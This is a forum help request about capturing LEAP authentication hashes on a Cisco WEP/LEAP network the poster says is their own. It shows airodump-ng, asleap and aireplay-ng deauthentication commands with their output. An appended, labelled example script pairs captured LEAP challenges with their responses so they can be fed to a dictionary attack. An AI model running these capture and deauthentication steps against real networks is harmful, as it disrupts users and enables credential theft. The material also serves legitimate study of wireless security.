Hey wireless specialists

It's my first post; I would be very grateful if someone could help me with my questions.

I'm learning about attacking a WEP/LEAP-authenticated network.

Basically, my network is a Cisco AP configured with WEP/LEAP, authenticating against an LDAP server (integrated with my Domain Controller).

I have 3 different APs with the same configuration to cover our whole company space; all have the same BSSID, and it's not broadcast.

I was able to see my network with Kismet or airodump-ng, and I can extract a few hashes (with asleap) from the .pcap file generated by airodump-ng. But my problem and question is: why can't I see and extract the hashes of all the authentications? And why can't I force existing clients to de-authenticate and authenticate again so that I can collect the hashes?

Well, my airodump-ng output looks like this:

airodump-ng -w ch06 --channel 06 --bssid 00:26:43:22:85:A2 wlan0

 CH  6 ][ Elapsed: 1 min ][ 2009-12-15 13:33

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:26:43:22:85:A2  -27   7      273      208    0   6  54e. WEP  WEP         FWCHP

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

 00:26:43:22:85:A2  00:23:CB:82:AA:90  -17    2e-54     5      235
 00:26:43:22:85:A2  00:1E:65:A2:49:7C  -21   54e-54e    4       16
 00:26:43:22:85:A2  00:13:E8:1C:A3:90  -32   54e-18e    0       13
 00:26:43:22:85:A2  00:1B:77:2C:8F:FA  -40   36e-48e    0       12
 00:26:43:22:85:A2  00:13:02:C4:76:14  -42   36e-36e    0       23
 00:26:43:22:85:A2  00:1C:BF:22:AC:92  -35    5e- 1e   28      192

As you can see, I was targeting a specific AP (one of my 3) that is working on channel 6 with BSSID 00:26:43:22:85:A2. The name of my SSID is FWCHP. Isn't it strange that none of the clients from my 6 active connections ever probe for it?

Most of the time I never get any hashes captured; if I look at the pcap files I just get:

MySystem:~# asleap -s -r ch06-01.cap
asleap 2.2 - actively recover LEAP/PPTP passwords.
Closing pcap ...
Before reading the .cap file with asleap, I disconnected from the AP and authenticated again, and no hash was collected.

To make sure I was doing everything right, I powered down the machine, started it again and authenticated again, and the same thing happened: no hashes collected at my attacking machine, as demonstrated above. Any guess why?

If I keep it running for longer, sometimes I get:

MySystem:~# asleap -s -r ch06-01.cap
asleap 2.2 - actively recover LEAP/PPTP passwords.
LEAP Response, but does not match ID for previously observed request frame (136/154).
LEAP Response, but does not match ID for previously observed request frame (136/154).
Closing pcap ...
It's strange, since I was on the specific channel, with the specific BSSID, and waited for more than 4 hours. Also, I disconnected and reconnected several times and got no hashes. I don't understand why I'm not capturing them and why the tool says it is unable to match the ID. Any guess why it's happening?

My first try was to force clients (stations) to disconnect / de-authenticate, so that when they connect again I should get the hashes, right?

I did it like this:

MySystem:~# aireplay-ng -a 00:26:43:22:85:A2 -c 00:23:CB:82:AA:90 -e FWCHP --deauth 15 wlan0
13:42:49 Waiting for beacon frame (BSSID: 00:26:43:22:85:A2) on channel 6
13:42:51 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 1| 0 ACKs]
13:42:52 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 1| 0 ACKs]
13:42:53 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 0| 0 ACKs]
13:42:54 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 0| 0 ACKs]
13:42:55 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 0| 0 ACKs]
13:42:56 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 0| 0 ACKs]
13:42:57 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 0| 0 ACKs]
13:42:58 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 1| 0 ACKs]
13:42:59 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 0| 0 ACKs]
13:43:00 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 0| 0 ACKs]
13:43:01 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 0| 0 ACKs]
13:43:03 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 1| 0 ACKs]
13:43:04 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 0| 0 ACKs]
13:43:05 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 3| 0 ACKs]
13:43:06 Sending 64 directed DeAuth. STMAC: [00:23:CB:82:AA:90] [ 0| 0 ACKs]
But it never generated any hash. And worse, the client (station) 00:23:CB:82:AA:90 never got disconnected. The machine was right next to me and I was watching it the whole time, and it never lost connectivity.

Strange, isn't it? Any guess why?

I did this test, since I believe it may help:

MySystem:~# aireplay-ng -a 00:26:43:22:85:A2 -c 00:23:CB:82:AA:90 -e FWCHP --test wlan0
13:48:07 Waiting for beacon frame (BSSID: 00:26:43:22:85:A2) on channel 6
13:48:07 Trying broadcast probe requests...
13:48:09 No Answer...
13:48:09 Found 1 AP

13:48:09 Trying directed probe requests...
13:48:09 00:26:43:22:85:A2 - channel: 6 - 'FWCHP'
13:48:16 0/30: 0%
I would be very grateful if someone could give me hints to improve my attack and explain where I'm failing or doing things wrong.

I'm using BackTrack.

Thanks.

Regards,
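The ID-matching step behind the asleap message quoted in the post ("LEAP Response, but does not match ID for previously observed request frame"), as an added example that is not part of the original post and is not asleap's own code. It parses EAPOL-encapsulated EAP-LEAP packets, pairs each 24-byte LEAP response with the 8-byte challenge that carries the same EAP identifier, and reports responses whose challenge was never captured, which is exactly what happens when the sniffer only catches half of an exchange. The frames, usernames, challenge bytes and EAP identifiers are constructed inline for illustration; extracting the EAPOL payload from the 802.11 data frames of a real capture (LLC/SNAP, ethertype 0x888E) and the dictionary attack itself (MD4 of the password, three DES operations over the challenge) are left to asleap and are not implemented here.

```python
"""Pair LEAP challenge/response frames by EAP identifier.

Added example, not code from the original post or from asleap. The frames
are constructed inline; usernames, challenges and EAP identifiers are
made up for illustration.
"""
import struct
from collections import namedtuple

EAP_REQUEST, EAP_RESPONSE = 1, 2
EAP_TYPE_LEAP = 17
EAPOL_EAP_PACKET = 0

LeapFrame = namedtuple("LeapFrame", "code id version count data name")


def parse_eapol_leap(frame):
    """Return a LeapFrame for an EAPOL frame carrying EAP-LEAP, else None.

    EAPOL header: version(1) type(1) length(2). EAP header: code(1) id(1)
    length(2) type(1). LEAP body: version(1) unused(1) count(1) data(count)
    name(rest). Challenges carry count=8, responses count=24.
    """
    if len(frame) < 4:
        return None
    _ver, eapol_type, eapol_len = struct.unpack("!BBH", frame[:4])
    if eapol_type != EAPOL_EAP_PACKET:   # EAPOL-Start, EAPOL-Key, ... are not EAP
        return None
    eap = frame[4:4 + eapol_len]
    if len(eap) < 8:
        return None
    code, ident, length = struct.unpack("!BBH", eap[:4])
    if code not in (EAP_REQUEST, EAP_RESPONSE) or length > len(eap) or length < 8:
        return None
    eap = eap[:length]
    if eap[4] != EAP_TYPE_LEAP:
        return None
    version, count = eap[5], eap[7]
    data = eap[8:8 + count]
    if len(data) != count:
        return None
    name = eap[8 + count:].decode("ascii", errors="replace")
    return LeapFrame(code, ident, version, count, data, name)


def pair_leap_exchanges(frames):
    """Walk frames in capture order and pair responses with challenges.

    Returns (pairs, orphans, unanswered):
      pairs      - (eap_id, username, challenge, response), the material a
                   dictionary attack on the NT hash needs
      orphans    - (response_id, last_request_id) for responses whose
                   challenge was never captured: the case asleap reports as
                   "does not match ID for previously observed request frame"
      unanswered - EAP ids of challenges that never got a response
    """
    pending = {}            # EAP id -> challenge frame still waiting for a response
    last_request_id = None
    pairs, orphans = [], []
    for raw in frames:
        f = parse_eapol_leap(raw)
        if f is None:
            continue
        if f.code == EAP_REQUEST and f.count == 8:
            pending[f.id] = f
            last_request_id = f.id
        elif f.code == EAP_RESPONSE and f.count == 24:
            req = pending.pop(f.id, None)
            if req is None:
                orphans.append((f.id, last_request_id))
            else:
                pairs.append((f.id, f.name or req.name, req.data, f.data))
    return pairs, orphans, sorted(pending)


def build_leap(code, ident, data, name):
    """Serialise one EAP-LEAP packet inside an EAPOL frame (used only to
    construct the sample capture below)."""
    body = bytes([EAP_TYPE_LEAP, 1, 0, len(data)]) + data + name.encode("ascii")
    eap = struct.pack("!BBH", code, ident, 4 + len(body)) + body
    return struct.pack("!BBH", 1, EAPOL_EAP_PACKET, len(eap)) + eap


def sample_capture():
    """Constructed frames standing in for an airodump-ng capture: a challenge
    (id 136) whose response was missed, a stray response (id 154) whose
    challenge was missed, and one complete exchange (id 137). Names and
    challenge values are made up."""
    return [
        build_leap(EAP_REQUEST, 136, bytes.fromhex("0123456789abcdef"), "corp\\alice"),
        bytes([1, 1, 0, 0]),                                              # EAPOL-Start
        build_leap(EAP_RESPONSE, 154, bytes(24), "corp\\bob"),
        build_leap(EAP_REQUEST, 137, bytes.fromhex("fedcba9876543210"), "corp\\carol"),
        build_leap(EAP_RESPONSE, 137, bytes(range(24)), "corp\\carol"),
    ]


if __name__ == "__main__":
    pairs, orphans, unanswered = pair_leap_exchanges(sample_capture())
    for eap_id, user, chal, resp in pairs:
        print(f"id {eap_id}: {user} challenge={chal.hex()} response={resp.hex()}")
    for resp_id, req_id in orphans:
        print(f"LEAP Response id {resp_id} has no captured challenge (last request id {req_id})")
    print("challenges without a response:", unanswered)
```

Running the script on the constructed capture yields one usable pair (id 137), one orphaned response (id 154, last challenge seen was 136) and one unanswered challenge (136). A capture that produces only orphans and unanswered challenges, as in the post, means the sniffer is missing one direction of the exchange, so there is nothing for a dictionary attack to work on regardless of how long it runs.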